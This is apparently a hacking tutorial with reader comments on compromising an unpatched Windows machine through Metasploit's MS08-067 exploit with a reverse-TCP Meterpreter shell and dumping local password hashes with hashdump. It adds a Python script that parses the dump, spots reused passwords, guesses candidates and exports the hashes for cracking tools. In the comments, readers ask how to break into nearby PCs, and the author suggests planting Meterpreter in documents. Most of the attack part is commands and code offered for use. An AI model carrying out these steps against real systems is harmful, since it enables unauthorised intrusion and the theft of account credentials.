Hack Like a Pro: How to Remotely Grab Encrypted Passwords from a Compromised Computer


Welcome back, my fledgling hackers!

There's an evil dictator hellbent on destroying the world, and in one of our last hacks, we successfully compromised his computer and saved the world from nuclear annihilation. Then, we covered our tracks so no one would know what we did, and developed a hack to capture screenshots of his computer periodically so we could keep track of what he was up to next.

With this new hack, we'll capture the passwords from the maniacal dictator's computer so that we can access his PC through his account, or anyone else's account on that machine, including the most important one: the local administrator's.

Windows keeps local account credentials in the SAM (Security Account Manager), a registry hive stored on disk as the file C:\Windows\System32\Config\SAM. It doesn't hold the passwords themselves but one-way hashes of them, and the hive is locked by the operating system while Windows is running and further protected with a boot key kept in the SYSTEM hive, so you can't simply copy the file off a live machine. That's fine: once we have control of his computer, as we already do, we can have our payload read the hashes straight out of the running system, transfer them to our machine, and crack them later at our leisure.

So, let's fire up our trusty framework hacking tool, Metasploit, and let's go grab those passwords!

Step 1: Compromise the System

Once again, let's use a tried and true exploit. Keep in mind that MS08-067 only works against unpatched Windows 2000, XP and Server 2003 hosts; it will not work against Windows 7 or later. Type:

  • msf > use exploit/windows/smb/ms08_067_netapi

Now, let's set the payload to our all-powerful Meterpreter. Note that the payload path has no leading slash:

  • msf (ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

Now is a good time to check the module's options with show options.

We need to set both LHOST (the IP address of our computer, where the reverse connection will come back to) and RHOST (the IP address of the victim computer). Let's set these now.

  • msf (ms08_067_netapi) > set RHOST 192.168.1.108
  • msf (ms08_067_netapi) > set LHOST 192.168.1.109

With everything set, now all that's left to do is exploit!

  • msf (ms08_067_netapi) > exploit

We now have a Meterpreter session on the maniacal dictator's computer!

Step 2: Grab the Password File

As you've seen in my previous tutorials, Meterpreter has several powerful commands and scripts built in. In this case, we'll be using one called hashdump. It reads the hashes out of the registry on the live system, which requires SYSTEM privileges; the MS08-067 exploit lands us inside a service that already runs as SYSTEM, but if you arrive in a session as an ordinary user you'll need to run getsystem first.

Just a bit of explanation before we grab those passwords...

For security reasons, most operating systems (including every modern version of Windows) don't store the passwords at all; they store hashes of them. A hash is a one-way function: the password produces the hash, but there is no key that turns the hash back into the password, which is why people loosely call it "one-way encryption." Windows keeps up to two hashes per local account: the old LM hash (no longer stored by default since Vista) and the NT hash, an unsalted MD4 of the password encoded as UTF-16. Those hashes are what we're after, hence the name hashdump.

So, let's go ahead and grab those hashes!

  • meterpreter > hashdump

As you can see, we now have several users and their password hashes, one per line in the format username:RID:LM hash:NT hash:::. An LM field of aad3b435b51404eeaad3b435b51404ee means no LM hash is stored for that account, and an NT field of 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of an empty password. Of course, we can't read the rest yet, but come back for my next tutorial and I'll show you how to crack them so that we can use them at our leisure.

Remember, once we have the maniacal dictator's password, it's likely that he uses that same password on systems other than this one (e.g. email, secure areas, etc.), giving us access to many of his secure assets.
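A quick triage of what hashdump hands you, as an added example that is not part of the original post or of Metasploit: it parses the user:RID:LM hash:NT hash::: lines described above, flags blank passwords, stored LM hashes and accounts that share a hash (the password-reuse point just made), checks a few candidate passwords by computing NT hashes the way Windows does (unsalted MD4 over the UTF-16LE password, implemented inline because hashlib's md4 is disabled on many OpenSSL 3 builds), and saves the hashes in the formats John the Ripper and hashcat accept. The hashdump rows, account names and the "bodyguard" placeholder hash are constructed sample data, not output from a real host.

```python
"""Triage Meterpreter hashdump output and save it for cracking.
Added example, not from the original post. SAMPLE below is constructed."""
import struct
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # "no LM hash stored"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# Constructed sample: Administrator and dictator share the NT hash of
# "password"; dictator also has an LM hash stored; bodyguard's NT hash is
# a made-up placeholder that no candidate will match.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
dictator:1000:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
bodyguard:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""


def _md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 is often unavailable)."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    F = lambda x, y, z: (x & y) | (~x & mask & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (F, 0, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for fn, k_add, order, shifts in rounds:
            for i, k in enumerate(order):
                a, b, c, d = d, rotl((a + fn(b, c, d) + X[k] + k_add) & mask, shifts[i % 4]), b, c
        A, B, C, D = (A + a) & mask, (B + b) & mask, (C + c) & mask, (D + d) & mask
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> str:
    """NT hash = MD4 of the UTF-16LE password, with no salt."""
    return _md4(password.encode("utf-16le")).hex()


def parse_hashdump(text: str) -> list:
    """Turn hashdump lines into records; skips blanks and [*] status lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("["):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        records.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return records


def audit(records: list) -> list:
    """Cheap wins before cracking: blank passwords, LM hashes, reused hashes."""
    findings, by_nt = [], defaultdict(list)
    for r in records:
        if r["nt"] == EMPTY_NT:
            findings.append(f"{r['user']}: empty password")
        if r["lm"] != EMPTY_LM:
            findings.append(f"{r['user']}: LM hash present (14 chars max, "
                            "case-insensitive, crackable in hours)")
        by_nt[r["nt"]].append(r["user"])
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings.append(f"password reuse: {', '.join(users)} share NT hash {nt}")
    return findings


def try_candidates(records: list, candidates: list) -> dict:
    """NT hashes are unsalted, so one hash per guess checks every account."""
    table = {nt_hash(p): p for p in candidates}
    return {r["user"]: table[r["nt"]] for r in records if r["nt"] in table}


def export(records: list) -> tuple:
    """pwdump lines for 'john --format=NT' and user:hash lines for
    'hashcat -m 1000 --username'."""
    john = "".join(f"{r['user']}:{r['rid']}:{r['lm']}:{r['nt']}:::\n" for r in records)
    hashcat = "".join(f"{r['user']}:{r['nt']}\n" for r in records)
    return john, hashcat


if __name__ == "__main__":
    recs = parse_hashdump(SAMPLE)
    for finding in audit(recs):
        print(finding)
    print("quick hits:", try_candidates(recs, ["password", "letmein", "Password1"]))
    john, hc = export(recs)
    open("hashes.pwdump", "w").write(john)   # for John the Ripper
    open("hashes.nt", "w").write(hc)         # for hashcat
```

To use it on real output, save the text the hashdump command prints to a file and pass its contents to parse_hashdump instead of SAMPLE. The candidate check costs one MD4 per guess for the whole user list, which is exactly why unsalted NT hashes crack so quickly and why a password that turns up twice on this box is worth trying on the dictator's other accounts.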


Photos by Andrey Popov / Shutterstock, Rob Hyrons / Shutterstock, Maksim Kabakou / Shutterstock

37 Comments

My idea is: DO NOT HACK. IT IS THE WRONG THING TO DO AND SCREWS UP A COMPUTER. I did it and my computer got screwed, so I had to get a new one.

Hell Master:

Sorry to hear about your computer. If you had done the hack correctly, your computer would be fine. I recommend you spend a little time studying my tutorials.

OTW

Hi, thanks for this tutorial. You have to be connected to the local network, right? I mean, your PC and the dictator's have to be connected to the local network?

BackTrack Hack:

Not necessarily. In the example I showed here, they are on the same network, but you can connect to any computer on the Internet, if you can reach it.

OTW

I'm new here, but I've noticed you basically control the Null Byte section of this site and I'm already a fan of these super easy tutorials. I was curious if you're still using Ubuntu, or if you are using the new Kali 1.0 Debian-based system.

Sky Captain:

We will be moving to Kali in coming weeks. BackTrack 5r3 is still a very viable hacking system and is still used by most hackers and penetration testers.

I'll be progressing to more advanced hacks as time goes on.

OTW

I can't find the beginning of your guide :(

Hello. As you can see, I have a little problem. I was trying to compromise a Windows PC and I couldn't. Can someone help me?

Marito:

Thanks for that image. That helps a lot.

It looks like the host is unreachable. Do you have the correct IP address? Is there a firewall between you and the remote host?

OTW

I have the right IP address and yes, there is a firewall. What should I do?

Marito:

Some info would be useful. The IP address is a private IP. It should be on your internal network. Generally, firewalls block external traffic. Where are you trying to hack?

Also, what is the OS of the victim system?

OTW

I'm at home trying to hack another computer (Windows OS) which is next to me. We are on the same network.

Marito:

What is your IP address?

Which Windows? 7, 8, 2008, XP, 2003?

Windows 7.
Mine: 192.168.1.65
The other: 192.168.1.66

Marito:

The hack you have chosen won't work on Windows 7, but that doesn't explain why the host is unreachable. You might try using a hack that embeds the Meterpreter in a PDF or Word doc, or cross-site scripting.

OTW

Ok. I will try. Thanks :)

What is the command to grab encrypted passwords from Windows 7?

Rico:

There is no single command to grab encrypted passwords in Win 7. You need to compromise the system, then get the Meterpreter on it, and then run hashdump.

If you have physical access, you can use pwdump with Cain and Abel.

OTW

OTW :

Thanks, and do you have a tutorial about using pwdump with Cain and Abel in BackTrack?

The c:\windows\system32\config\ folder is empty.
... What should I do?
Is it because I am on an admin account?

Koly:

I'm sorry, but I don't understand your question?

OTW

Empty folder -.-
My admin account has a password, but there is no folder called SAM or any other file.

Hey, listen @KOLY CRAFTER... you are at the wrong point. SAM doesn't exist there, as there are two such places in Windows and you are at the wrong one. Get over to C:\windows\system32\config... you will surely encounter SAM here, but you won't be able to view the encrypted contents, nor copy or move SAM.

@METASPLOIT might help you, or else I have the permanent solution.

I need your help @OCCUPIT HEWEB. I somehow managed to get SAM onto my thumb drive; I took it to another system and am still unable to decrypt it. Please give a permanent solution for this damn issue.

Genuine:

Do you have Cain and Abel or John the Ripper? Either one can decrypt the passwords.

OTW

OTW :
Thanks for your suggestion. I will soon reply whether it worked or not.

Hi OTW, I've exploited a Windows 7 PC and gotten Meterpreter on it. When I attempt to use hashdump, it responds with "priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect." I've tried a few things but I cannot figure out how to fix this error.

Thanks

Hi OTW, I have a problem. Please help.

set payload /windows/meterpreter/reversetcp

In this command, it shows "wrong location".

What does that mean, "wrong location"?

When I enter this command: set payload /windows/meterpreter/reversetcp

it shows:

The value specified for payload is not valid.

Please help, OTW.

First, check your spelling. Second, not every payload is compatible with every exploit. What exploit are you using?

@OCCUPYTHEWEB I have the same problem as MehulVerma. I tried to set the payload for the ms08_067_netapi exploit like it is written in the article, but it says "the value specified for payload is not valid". I used /windows/meterpreter/reversetcp for the payload. Please help :)

I previously had this problem also. In your command on here you are not putting the underscore in reversetcp.

Furthermore, the slash before windows stopped mine from working. I was using it as /windows/meterpreter/reversetcp and it didn't work, but as soon as I removed the slash before windows at the start to change it to windows/meterpreter/reversetcp, it worked :)

Hope this helped :)

Can I hack the password of an account on a Win7 computer in my LAN?

Hello. How can we get the RHOST of a victim's computer when we try to hack into their system? How do we find out their IP address?

Hey,
I have a simple question on how to save the dumped hashes in the Metasploit Framework. Can you tell me how it's done?
